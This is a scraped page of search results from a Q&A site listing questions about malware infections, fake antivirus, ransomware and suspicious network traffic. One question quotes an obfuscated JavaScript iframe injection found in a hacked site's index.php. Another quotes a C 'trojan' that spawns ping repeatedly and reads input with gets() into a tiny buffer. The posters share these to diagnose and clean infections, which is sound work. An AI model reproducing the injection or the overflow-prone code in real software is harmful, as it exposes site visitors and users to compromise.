Search Results

Search found 639 results on 26 pages for 'malware'.

Page 9/26 | < Previous Page | 5 6 7 8 9 10 11 12 13 14 15 16  | Next Page >

  • How does Antimalware Doctor infect computers?

    - by Pyrolistical
    I didn't do anything stupid like run random .exe or visit questionable websites, but as I was just Googling I get infected by Antimalware Doctor. At that point I just shutdown my computer and reformatted, so I didn't check if I had the latest version of Flash or Firefox. Is it possible to get infected just because I didn't have my Flash newer than 10.1 and some random flash ad infected me? There doesn't seem to be any information on how Antimalware Doctor works asides from how to remove it.

    Read the article

  • How did what appears to be a virus get on my computer? (explanation of situation enclosed)

    - by Massimo
    My system is Windows XP SP3, updated with the latest patches. The PC is connected to a Cisco 877 ADSL router, which does NAT from the internal network to its single static public IP address. There are no forwarded ports, and the router's management console can only be accessed from the inside. I was doing two things: working on a remote office machine via VPN and browsing some web pages on the Cisco web site. The remote network is absolutely safe (it's a lab network, four virtual servers, no publicly accessible services and no users at all; also, none of what I'm going to describe ever happened there). The Cisco web site... well, I suppose is quite safe, too. Suddenly, something happened. Strange popups appears anywhere; programs claiming they're "antimalware", "antispyware" et so on begins autoinstalling; fake Windows Update and Security Center icons pop up in the system tray. svchost.exe began crashing repeatedly. Then, finally, after some minutes of this... BSOD. And, upon rebooting, BSOD again. Even in safe mode. Ok, that was obviously some virus/trojan/whatever. I had to install a new copy of Windows on another partition to clean things up. I found strange executables, services and DLLs almost anywhere. Amongst the other things, user32.dll and ndis.sys had been replaced. A fake software called "Antimalware Doctor" had been installed. There were services with completely random names or even GUIDs (!), and also ones called "IpSect" and "Darkness". There were executable files without an .exe extension. There were even two boot-class drivers, which I'm quite sure are the ones that finally caused the system to crash. A true massacre. Ok, now the questions: What the hell was that?!? It was something more than a simple virus! How did it manage to attack my computer, as I am behind a firewall and was not doing anything even only potentially harmful on the web at the time?

    Read the article

  • How do I properly check if a program is a virus/trojan in VMware?

    - by acidzombie24
    How I should check if a program is a virus in VMware? Some programs I do need admin ability to install and it makes sense. But how do I know if it's doing more than I want? Some thoughts are: How many processes open when I launch the application What is added to the startup tab in msconfig If any services are added. That's pretty much all my ideas. Even if it does something I recognize I wouldn't know if it's necessary or not. What are some rule of thumb? -Edit- What about registries, can I use that information to help? Maybe have a scanner tell me if the application I just used has messed with sections (like bootup) it shouldn't have?

    Read the article

  • How can I automatically require a password when connecting to a WD MyBookLive?

    - by user-123
    I have created a user which has specific privileges to access the shares on our WD MyBookLive Network drive (ie it requires a password to connect), however after connecting once Windows seems to remember the password (or at least for the rest of the session). How can I make it so it is necessary to require a password every time the user connects to the drive or makes some change on Windows? I am particularly thinking of Cryptolocker and other variants of "ransomeware" which will try and connect to the drive and encrypt it.

    Read the article

  • Can't open Control Panel or IE

    - by Josh
    I have a XP computer where when ever I try to open Control Panel nothing happens, nothing flashes on the screen. Same thing with Internet Explorer. I've scanned the computer with Malwarebytes and Avast, Malwaresbytes found some Adware which it removed without problems. Avast found nothing. I looked at the running processes with Process Explorer, nothing malicious running. And looked at a Process Monitor output when I tried to run IE, nothing obviously wrong. The process just decides to exit. What can I try next? I would suspect corrupt IE install but Control Panel doesn't work either. UPDATE: Nether work in Safe Mode under the user account. (only 1 user on the computer) But in Safe Mode, under the built in Administrator account, they work. So what ever is broken, is only broken in the one account. Anything under the HKCU registry key that could break this?

    Read the article

  • md5sum or sha1sum of legitmate microsoft system files

    - by martyvis
    Is there a database or repository of the legitimate checksums for Microsoft system files? We think we have a 0day on DNS for Windows 2003 SP2 using IRC for command and control. (Latest McAfee does not see an issue). I want to compare our customer's dns.exe and associated DLLs with the real ones. (I will grab a fresh SP2 and hotfixed system to do this, but wonder how to do this in future without needed to do this.)

    Read the article

  • Tracing what program is making a network connnection? (CentOS)

    - by Airjoe
    I was wondering if it is possible to find out which process is trying to make a specific network connection. On a server I support which hosts websites for about 200 users, the iptables firewall keeps blocking, as it should, a connection to 212.117.169.139 on port 80. Firefox reports this as an attack page (and at the least is obvious spam, if not malicious). It seems something on this server is trying to access this site for some reason, and although it's being blocked successfully, the requests seem to be going through every two to sixty seconds and I'd like to be able to find what process or script is doing this so I can handle it appropriately. Besides doing a grep to try and find if this IP is in some file (which probably won't even work because it may be working by hostname or it may be encoded), is there any way to find out some more information? Thanks!

    Read the article

  • Strange ports on default install of W7

    - by Sabre
    I have a base new install of windows 7, and when I went to look for something else I saw the attached netstat output. What concerns me is that this is Windows + Truecrypt + drivers, nothing else installed. The sequential high ranged ports belonging to several different seemingly not out of place services seemed odd. So I torched the install, used Active@ to scrub the disk, re-downloaded the ISO from MSDN, and did a fresh reinstall, viola, they are there again. It just seems out of place, I have seen a many netstats over the years, this one just strikes me as odd, so I started thinking rootkit? (JUst FYI, when I reloaded I named the machine "Error" so that is why the task manager reads the computer name as such.) So I would like to know if anyone else could explain it, and therefore is may be normal, or would they be worried as well, and should I start considering I have some very strange thing occuring on my network?

    Read the article

  • File types and locations (if any) to exclude from AntiVirus scanning?

    - by CAD bloke
    Should I add any file types to my anti-virus's file type exclusion list? If so, which types? Should I add any locations (specifically for Windows 7) to an exclusion list? If so, which locations? Google found me a few references like http://support.microsoft.com/kb/822158 http://support.microsoft.com/kb/943556 and some site purporting to conduct expert sex changes but haven't found anything particularly confidence-inspiring.

    Read the article

  • Browser keeps being really rude to me today

    - by j-t-s
    Hi All I've had this problem only once before, years ago. I bought a new computer the other day and last night I visited a website which Google Chrome suspected was an insecure site. So I proceeded to view the page anyway (Stupid, I know... But I was curious), and all of a sudden the window closed and ever since, every few minutes either Google chrome or Internet Explorer keeps popping up with random websites, most of which are porn-related sites. I have downloaded ZoneAlarm, IOBit 360, Eset Smart Security and none of them reported any problems. I still have the rube browser problem. Can somebody please suggest any software/ways to fix this? (Other than to reformat please :)) Thank you :)

    Read the article

  • What are the most common dangerous domains that I should block?

    - by Dalia
    I am trying to configure my wireless router to block domains that are potentially dangerous to privacy, security, and bandwidth-hogs. Is there a list of domains that I can block at the router level? On a machine level, I have set the hosts file from www.mvps.org and that works on my machine. However, I want to implement something at the router level too - so that all computers in my household are somewhat protected.

    Read the article

  • Unidentified Window OnStartup

    - by CMP
    Every time I start up windows vista lately, I see a random floating window. It is a tiny little window with no title, and only the resize, maximize and restore buttons. I'd post an image, but I don't have reputation here yet. I can close it, and it does indeed go away, but I would love to figure out what it is and stop it from popping up at all. I used Autohotkey's window spy on it and all I learned is that it is a swing window, which doesn't help me out a whole lot. Is there a good way to identify which process it belongs to and figure out how to kill it?

    Read the article

  • Monitor programs accessing my keyboard?

    - by Anti Earth
    As of a few days ago, my computer is behaving 'erratically'. When I am typing, my pointer will randomly move to another place in the text and start typing a semi-random string of characters. ("gvyfn" is common; It has typed this about 8 times whilst I composed all the text above) It often highlights part of or all the text and overwrites it. It sometimes goes into loops of pressing Control-alt-delete down, bringing up Windows 7 menu thing. It sometimes even messes with mouseclicks; they have unexpected results, like requesting admin priveledges from applications, instead of switching to their window. I believe this is because it is holding a alt-function key down. This behaviour happens periodically, in waves. It might subside for an hour, then continue to haunt me. I believe it to be a virus or malicious program. My anti-virus (Symantec) and multiply MS rootkit removers could not find anything suspicious. I've noticed that sometimes it re-maps keys, and types gibberish when I press certain keys (though no pattern is evident). I believe a malicious program has installed a keyhook on my computer. I'm wondering... - Is there a way to let me view which programs are emulating keystrokes? - Is there a way to view what keyboard hooks are installed? (I'm also at liberty to try any other techniques to remove this blasted thing. It is easily the most fustrating computer problem I've encountered). Thanks!

    Read the article

  • All PHP files getting hacked

    - by nsearle
    Hey All, Like always, just want to say thank you for all of the help and input in advance. I have a particular site that I am the web developer for and am running into a unique problem. It seems that somehow something is getting into every single PHP file on my site and adding some malware code. I have deleted the code from every page multiple times and changed FTP and DB passwords, but to no avail. The code that is added looks like this - eval(base64_decode(string)) - which the string is 3024 characters. Not sure if anyone else has ran into this problem or if any one has ideas on how I can secure my php code up. Thanks again.

    Read the article

  • what does this attempted trojan horse code do?

    - by bstullkid
    It looks like this just sends a ping, but whats the point of that when you can just use ping? /* WARNING: this is someone's attempt at writing a malware trojan. Do not compile and *definitely* don't install. I added an exit as the first line to avoid mishaps - msw */ int main (int argc, char *argv[]) { exit(1); unsigned int pid = 0; char buffer[2]; char *args[] = { "/bin/ping", "-c", "5", NULL, NULL }; if (argc != 2) return 0; args[3] = strdup(argv[1]); for (;;) { gets(buffer); /* FTW */ if (buffer[0] == 0x6e) break; switch (pid = fork()) { case -1: printf("Error Forking\n"); exit(255); case 0: execvp(args[0], args); exit(1); default: break; } } return 255; }

    Read the article

  • Zberp : le malware qui combine les caractéristiques de Zeus et Carberp est « un monstre hybride » pour des chercheurs de Trusteer

    Zberp : le malware qui combine les caractéristiques de Zeus et Carberp est « un monstre hybride » pour des chercheurs de Trusteer Les chercheurs en sécurité de Trusteer, une filiale d'IBM, ont mis le doigt sur un nouveau cheval de Troie qui combine les caractéristiques de Zeus et de Carberp, deux malwares qui ont fait des attaques contre les sites de banque en ligne leur spécialité. Baptisé Zberp (Zeus + Carberp), le Trojan a déjà attaqué plus de 450 institutions financières de par le monde,...

    Read the article

  • Why would BitDefender Bootable Rescue CD be able to identify but unable to fix or delete malware?

    - by DaveDev
    Why would BitDefender Bootable Rescue CD (and loads of other Rescue CDs too) be able to identify but unable to fix or delete malware? It can however put it into quarintine. And what happens when the viruses are put into quarintine? It dosn't really mean anything if it can successfully put the malware into quarintine if it's a CD-bootable OS. It's only quarintined in the context of the memory it exists in. When I restart windows, I'm still infected with loads of viruses. Thanks Dave

    Read the article

  • Website index.php page chnages automatically with one script in the end

    - by Mirage
    I have seen that , this happend twice that , in my root index.php file. I have this thing added <html><body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5='1'vxoq5='1'>";str = str.replace('vde', 'i');str =str.replace('pog', 'fr');str = str.replace('nbt', 'ame');str =str.replace('Oaoz5', 'width');str =str.replace('vxoq5','height');document.write(str);</script></body></html> Does anyone knows what is that and how it comes. When i tried to open my webiste in google chrome , it told me that some malacious software is trying to run from harmful website , do you want to allow it. How ever when deleted that script then everything was ok But this ahppedn twice in 2 weeks Is that the virus . how can something chANGE MY CODE i AM USING JOOMLA

    Read the article

  • My website is infected with JS:ScriptIP-inf [Trj]

    - by Rizwan Aaqil
    I am using Network Solutions hosting. I was recently attacked with JS:Illredir-S [Trj], I asked my hosting providers to clean it and they cleaned it and updated all passwords, but now after a week my site got infected again with JS:ScriptIP-inf [Trj]. Can anyone please suggest me how to secure my website properly ? Should I change my hosting provider ? I am fed up of these viruses again and again on my websites. I can't even find this virus in my files. Please post informative answers. Thanks

    Read the article

  • Le mystère du "Framework Duqu" est résolu, le malware aurait été écrit avec une extension C orientée objet créée sur mesure

    Le mystère du "Framework Duqu" est résolu Le malware aurait été écrit avec une extension C orientée objet créée sur mesure Mise à Jour du 20/03/2012 par MiaowZedong Les chercheurs de Kaspersky ont annoncé hier (19/03/2012) qu'ils avaient résolu « avec un niveau de certitude très élevé » le mystère Duqu. L'expert Igor Soumenkov commence par remercier les nombreux développeurs qui ont suggéré des pistes d'investigation : il annonce avoir reçu plus de 200 commentaires sur son blog et 60+ emails. Il dit donc « un grand merci » à tous ces participants. Parmi les différentes suggestions, le LISP, le Forth, Google Go, l'Erlang, Delphi, les com...

    Read the article

  • Le Trojan Zeus/SpyEye se renforce encore avec le P2P et un module de partage de données, il devrait être la "star" des malware de 2012

    Le cheval de Troie Zeus/SpyEye se renforce Avec le P2P et un module de partage de données, il devrait être la "star" des malware de 2012 SpyEye refait parler de lui. Ce Cheval de Troie « bancaire » espionne les connexions aux comptes en ligne et dérobe des informations personnelles (login, mot de passe, numéro de cartes bancaires,?). Il peut injecter dans les machines des codes HTML permettant à celui qui les contrôle d'accéder à distance à toutes les données. Mais SpyEye a également pour particularité de cacher les transferts d'argent frauduleux en affichant un solde de compte erroné au client. Le mal agit même après qu'une personne se soit déc...

    Read the article

  • iOS piraté à l'aide d'un chargeur malicieux, des hackers installent un malware sur l'iPhone en moins d'une minute

    iOS piraté à l'aide d'un chargeur malicieux Des hackers installent un malware sur iPhone en moins d'une minuteLorsqu'il s'agit de parler de sécurité de périphériques mobiles, la tendance voudrait que ceux exécutant le système Android soient tout de suite mis au devant de la scène comme les moins sécurisés qui soient. Jamais on a à l'esprit de prononcer le nom iOS parce que considéré par beaucoup comme plateforme très sécurisée.Le mythe vient d'être brisé. Trois chercheurs en sécurité de l'état de Géorgie aux États-Unis viennent de dévoiler une faille permettant à un hacker d'installer une application malicieuse sur iOS sans que son propriétaire ne s'en rende compte.Billy Lau, Yeongjin Lang et Che...

    Read the article

  • Le code source du malware ultra - sophistiqué Carberp disponible en téléchargement, un bazooka entre les mains d'apprentis développeurs pour un expert

    Le nouveau malware bancaire ultra-sophistiqué « Carberp » défie Zeus De plus en plus de malwares ciblent Mozilla FirefoxZeus, Le cheval de Troie dont un des buts principaux est l'usurpation d'informations bancaires par Keylogging (enregistrement de frappe) n'a qu'à bien se tenir. Un sérieux concurrent vient de lui déclarer la guerre.Encore indétectable par 5 des 6 antivirus les plus répandus, il fait des ravages pour piller les comptes en banques en Europe et en Amérique au profit d'un groupe de criminels.Baptisé « Carberp », il met en action des mécanismes identiques à ceux de Zeus et cible les systèmes et navigateurs les plus populaires, à savoir Windows 7, Vista et XP, Internet Explorer et Moz...

    Read the article

  • Le code source du malware ultrasophistiqué Carberp disponible en téléchargement, un bazooka entre les mains d'apprentis développeurs pour un expert

    Le nouveau malware bancaire ultra-sophistiqué « Carberp » défie Zeus De plus en plus de malwares ciblent Mozilla FirefoxZeus, Le cheval de Troie dont un des buts principaux est l'usurpation d'informations bancaires par Keylogging (enregistrement de frappe) n'a qu'à bien se tenir. Un sérieux concurrent vient de lui déclarer la guerre.Encore indétectable par 5 des 6 antivirus les plus répandus, il fait des ravages pour piller les comptes en banques en Europe et en Amérique au profit d'un groupe de criminels.Baptisé « Carberp », il met en action des mécanismes identiques à ceux de Zeus et cible les systèmes et navigateurs les plus populaires, à savoir Windows 7, Vista et XP, Internet Explorer et Moz...

    Read the article

  • Stuxnet - how it infects

    - by Kit Ong
    Except from the CNET article.http://news.cnet.com/8301-13772_3-57413329-52/stuxnet-delivered-to-iranian-nuclear-plant-on-thumb-drive/?part=propeller&subj=news&tag=linkvThe Stuxnet worm propagates by exploiting a hole in all versions of Windows in the code that processes shortcut files, ending in ".lnk," according to...[the] Microsoft Malware Protection Center....Merely browsing to the removable media drive using an application that displays shortcut icons, such as Windows Explorer, will run the malware without the user clicking on the icons. The worm infects USB drives or other removable storage devices that are subsequently connected to the infected machine. Those USB drives then infect other machines much like the common cold is spread by infected people sneezing into their hands and then touching door knobs that others are handling.The malware includes a rootkit, which is software designed to hide the fact that a computer has been compromised, and other software that sneaks onto computers by using a digital certificates signed two Taiwanese chip manufacturers that are based in the same industrial complex in Taiwan--RealTek and JMicron, according to Chester Wisniewski, senior security advisor at Sophos.... It is unclear how the digital signatures were acquired by the attacker, but experts believe they were stolen and that the companies were not involved.Once the machine is infected, a Trojan looks to see if the computer it lands on is running Siemens' Simatic WinCC software. The malware then automatically uses a default password that is hard-coded into the software to access the control system's Microsoft SQL database. The Stuxnet worm propagates by exploiting a hole in all versions of Windows in the code that processes shortcut files, ending in ".lnk," according to...[the] Microsoft Malware Protection Center....Merely browsing to the removable media drive using an application that displays shortcut icons, such as Windows Explorer, will run the malware without the user clicking on the icons. The worm infects USB drives or other removable storage devices that are subsequently connected to the infected machine. Those USB drives then infect other machines much like the common cold is spread by infected people sneezing into their hands and then touching door knobs that others are handling.The malware includes a rootkit, which is software designed to hide the fact that a computer has been compromised, and other software that sneaks onto computers by using a digital certificates signed two Taiwanese chip manufacturers that are based in the same industrial complex in Taiwan--RealTek and JMicron, according to Chester Wisniewski, senior security advisor at Sophos.... It is unclear how the digital signatures were acquired by the attacker, but experts believe they were stolen and that the companies were not involved.Once the machine is infected, a Trojan looks to see if the computer it lands on is running Siemens' Simatic WinCC software. The malware then automatically uses a default password that is hard-coded into the software to access the control system's Microsoft SQL database.

    Read the article

< Previous Page | 5 6 7 8 9 10 11 12 13 14 15 16  | Next Page >